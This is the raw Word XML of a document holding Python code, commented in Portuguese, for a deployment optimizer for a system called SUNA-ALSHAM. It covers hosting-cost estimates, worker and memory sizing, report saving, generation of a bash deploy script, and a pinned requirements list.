    <w:p w14:paraId="3F4A9A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"hobby": 5.0,  # USD/month</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C16AA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"pro": 20.0,   # USD/month</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CA31C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"team": 100.0  # USD/month</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="189172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},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EE9E4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"heroku": {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DFBEA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"hobby": 7.0,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="146818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"standard": 25.0,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7875D6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"performance": 250.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BB251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},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62EB93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"aws": {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02771C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"t3.micro": 8.5,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E91C0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"t3.small": 17.0,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28A125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"t3.medium": 34.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4920AF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607E0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74F48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78D6F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estimate_monthly_cost(self, platform: str, tier: str) -&gt; Dict[str, float]:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4802FB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"""Estima custo mensal"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="357DC0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base_cost = self.pricing.get(platform, {}).get(tier, 0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34512E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96A1F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Custos adicionais estimados</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="674A68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redis_cost = 15.0 if platform == "aws" else 0  # Redis incluído em Railway/Heroku</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C8F3A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monitoring_cost = 10.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DCE5C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backup_cost = 5.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40B6D8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1ACBA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total_cost = base_cost + redis_cost + monitoring_cost + backup_cost</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A7659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9527E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7CCD9E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"base_cost": base_cost,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="774CEF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"redis_cost": redis_cost,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D9A16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"monitoring_cost": monitoring_cost,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B6593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"backup_cost": backup_cost,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02E380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"total_monthly": total_cost,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CB835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"total_yearly": total_cost * 12</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71D643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3DDED26" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="33DFA5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DeployOptimizer:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25EFDD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"""Otimizador principal de deploy"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E0915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D88FE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4B9741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self.validator = EnvironmentValidator()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04AD01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self.performance_optimizer = PerformanceOptimizer()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C2B82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self.security_checker = SecurityChecker()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C4A62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self.cost_estimator = CostEstimator()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CC35F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E2B97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generate_deployment_config(self, platform: str = "railway") -&gt; DeploymentConfig:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="596433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"""Gera configuração otimizada de deploy"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74291F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8B417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Detectar recursos do sistema</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FF031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memory = psutil.virtual_memory().total / (1024**3)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CAA03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cpu_count = psutil.cpu_count()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="414E99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F57A0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Configurações otimizadas baseadas no sistema</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FC674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memory &gt;= 4:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B6888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memory_limit = "2GB"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="545186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elif memory &gt;= 2:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56A8B5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memory_limit = "1GB"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="215625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00D9F7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memory_limit = "512MB"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="450993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B6A4D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cpu_limit = f"{min(cpu_count, 2)}"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5828A8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AC240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Variáveis de ambiente otimizadas</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="791F04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env_vars = {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35F18A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"PYTHON_VERSION": "3.11",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E516B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"WEB_CONCURRENCY": str(min((2 * cpu_count) + 1, 8)),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64A26E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"MAX_WORKERS": str(min(cpu_count * 2, 8)),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="468146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"WORKER_TIMEOUT": "120",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="686FE8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"KEEP_ALIVE": "2",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2842D0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"MAX_REQUESTS": "1000",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="263712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"MAX_REQUESTS_JITTER": "100",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29C6C4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"PRELOAD_APP": "true",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="496F63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"REDIS_MAX_CONNECTIONS": "20",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="514C4F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"CACHE_TTL": "3600",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="779F45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"LOG_LEVEL": "INFO",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="344545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"ENVIRONMENT": "production"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6076E8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CC25C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75436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DeploymentConfig(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54CDCD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platform=platform,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="763EF5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environment="production",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="684EFB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python_version="3.11",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="391941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memory_limit=memory_limit,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="190068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cpu_limit=cpu_limit,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FC8AA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auto_scaling=True,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1040A1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health_check_url="/health",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A7C9D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environment_variables=env_vars</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39BE69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)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58E193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0ED7D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run_optimization(self, platform: str = "railway") -&gt; DeploymentReport:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11F06D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"""Executa otimização completa"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F9ED6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start_time = time.time()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B9CB1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54A0C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Iniciando otimização de deploy...")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64C869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77502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Validações de ambiente</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EE182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🔍</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Validando ambiente...")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C5BB9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python_check = self.validator.validate_python_version()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35ED99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deps_check = self.validator.validate_dependencies()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="773223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resources_check = self.validator.validate_system_resources()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="598580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env_check = self.validator.validate_environment_variables()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="719DF8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453F5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Otimizações de performance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33F8AB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Otimizando performance...")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65E1E3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memory_opt = self.performance_optimizer.optimize_memory_settings()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25D159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worker_opt = self.performance_optimizer.optimize_worker_processes()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B651D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cache_opt = self.performance_optimizer.optimize_cache_settings()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="211D7F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db_opt = self.performance_optimizer.optimize_database_connections()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03A95D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37E72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optimizations = [memory_opt, worker_opt, cache_opt, db_opt]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74EC4A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7E3AE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Verificações de segurança</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64AC08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🛡️</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Verificando segurança...")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36C74A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env_security = self.security_checker.check_environment_security()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="168EDD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api_security = self.security_checker.check_api_security()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01E442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CDC24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security_checks = {**env_security, **api_security}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="145EF3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9B895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Métricas de performance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="595725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performance_metrics = {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F53C9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"memory_usage_mb": psutil.virtual_memory().used / (1024**2),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C7575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"cpu_usage_percent": psutil.cpu_percent(interval=1),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="511ABD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"disk_usage_percent": psutil.disk_usage('/').percent,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09E16A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"estimated_throughput": worker_opt.after_value * 100,  # requests/second</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27B4B0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"estimated_latency_ms": 50,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59E7B7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"cache_hit_rate": 0.85</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="297D1B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F958A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6E921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Recomendações</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18B007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recommendations = [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="342EDC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"Configure Redis para cache de alta performance",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04D5F2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"Implemente monitoramento com Prometheus/Grafana",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EBB94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"Configure auto-scaling baseado em CPU/memória",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D2AF0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"Implemente health checks robustos",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="136269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"Configure backup automático de dados",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="418315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"Implemente rate limiting por IP",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CCF4D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"Configure logs estruturados para análise",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17ECCE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"Implemente circuit breaker para APIs externas"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72AF12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]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41741C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E83AC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Estimativa de custos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C7380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cost_estimate = self.cost_estimator.estimate_monthly_cost(platform, "pro")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="360AB8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465AB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Tempo de deploy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B7C9E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deployment_time = time.time() - start_time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56D6BC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70398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Status geral</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FF43F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all_security_passed = all(security_checks.values())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="482440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status = "READY" if all_security_passed else "NEEDS_ATTENTION"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31B8FF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13432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report = DeploymentReport(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A7430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timestamp=datetime.now(),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="066F92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platform=platform,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="015B20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environment="production",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="200B57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status=status,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E1957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optimizations=optimizations,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D5063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performance_metrics=performance_metrics,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="700DBE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security_checks=security_checks,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A5F1E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recommendations=recommendations,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E2C04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estimated_cost=cost_estimate,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49C767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deployment_time=deployment_time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01E119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)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="339E68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F124F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Otimiza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 conclu</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>í</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>da em {deployment_time:.2f}s")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C77E9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F4F42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report</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EC509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80A5F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save_report(self, report: DeploymentReport, filename: str = "deployment_report.json"):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10EC35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"""Salva relatório de deploy"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50D71F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7DBA6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Converter para dict serializável</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7081FE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report_dict = asdict(report)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="461920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CFF6A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Converter datetime para string</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D9F88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def convert_datetime(obj):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C367C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isinstance(obj, datetime):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0147E0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obj.isoformat()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D8934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elif isinstance(obj, dict):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53B5CC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{k: convert_datetime(v) for k, v in obj.items()}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="006E5E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elif isinstance(obj, list):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25370B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[convert_datetime(item) for item in obj]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BC7D0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obj</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B9E5B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519BE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report_dict = convert_datetime(report_dict)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17A194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CB77A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with open(filename, 'w', encoding='utf-8') as f:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15EAEF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json.dump(report_dict, f, indent=2, ensure_ascii=False)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70F036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A7959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logger.info(f"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Relatório salvo em: {filename}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C731C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filename</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="570F45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FF583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generate_deploy_script(self, config: DeploymentConfig) -&gt; str:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08C9FC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"""Gera script de deploy"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47E148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8B3B6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script_content = f"""#!/bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1170CD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# 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SUNA-ALSHAM Deploy Script</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F809B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Gerado automaticamente em {datetime.now().isoformat()}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73DC39E0" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62A535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echo "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Iniciando deploy do SUNA-ALSHAM..."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76FF2B33" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="362941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Verificar Python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67D051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python3 --version</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DE632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[ $? -ne 0 ]; then</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="431FA4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echo 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Python 3 n</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ã</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>o encontrado"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30086F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exit 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EAC23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fi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CCF5776" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="795B0D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Instalar dependências</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35340D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echo "</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>📦</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Instalando dependências..."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="290742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pip3 install -r requirements_production.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16967B56" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26064F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Verificar variáveis de ambiente</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B2324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echo "</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🔍</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Verificando variáveis de ambiente..."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E43E8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[ -z "$OPENAI_API_KEY" ]; then</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E2D12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echo "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OPENAI_API_KEY não configurada"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="622DA0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fi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B6159EE" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="30C3BF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[ -z "$REDIS_URL" ]; then</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60861D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echo "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REDIS_URL não configurada"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14363D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fi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FE5FB22" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34E03E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Executar testes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19C734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echo "</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🧪</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Executando testes..."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A26FA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python3 comprehensive_test_suite.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1467C2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[ $? -ne 0 ]; then</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B9E88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echo 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Testes falharam"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BF370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exit 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="052615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fi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="210A1577" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1AE628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Iniciar aplicação</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AA159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echo "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Iniciando aplicação..."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AE0A7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[ "${{config.platform}}" = "railway" ]; then</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="477A30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python3 main_complete_system.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35935B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elif [ "${{config.platform}}" = "heroku" ]; then</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="711A43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gunicorn main_complete_system:app --bind 0.0.0.0:$PORT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="179A27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else</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FF6F1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python3 main_complete_system.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FA9A3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fi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79E59A6F" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="786291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echo 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Deploy conclu</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>í</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>do com sucesso!"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="786776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"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3440F8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B8E34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with open("deploy.sh", 'w') as f:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="598DF0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f.write(script_content)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="354F40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C581F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Tornar executável</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BCB3A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os.chmod("deploy.sh", 0o755)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E910D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DB949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📜</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Script de deploy gerado: deploy.sh")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4853E1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"deploy.sh"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5502B8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47B1A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generate_requirements(self) -&gt; str:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61AFCD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"""Gera requirements.txt otimizado"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="305D7F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DF6C5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requirements = [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EF6CF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"# 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SUNA-ALSHAM Production Requirements",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D8322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"# Core framework",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ADF34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"fastapi==0.104.1",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FEB86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"uvicorn[standard]==0.24.0",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49A03A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"",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22E57F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"# Multi-agent system",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="595695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"openai==1.3.0",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69A0D1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"redis==5.0.1",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="598DAF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"asyncio-mqtt==0.13.0",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B96DC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"",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="558493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"# Data processing",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A0EDE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"numpy==1.25.2",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="077B5E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"pandas==2.1.3",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22E501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"scipy==1.11.4",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="466D1F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"",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="635028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"# Monitoring and metrics",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="151B81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"psutil==5.9.6",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B39B0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"prometheus-client==0.19.0",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F3869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"",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="424261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"# Security",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07AD2F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"cryptography==41.0.7",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A10EE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"pyjwt==2.8.0",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16A7C6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"",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D8893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"# HTTP and networking",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B9BD1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"requests==2.31.0",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63D16D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"aiohttp==3.9.1",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74702E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"",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EB854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"# Utilities",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="508930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"python-dotenv==1.0.0",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A23F6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"pydantic==2.5.0",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10B2C9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"",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35E871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"# Production server",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="316500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"gunicorn==21.2.0",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AD5F6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"",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D4D61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"# Development and testing",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CA489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"pytest==7.4.3",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F2AE3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"pytest-asyncio==0.21.1"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B6D85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]</w:t>
      </w:r>
    </w:p>
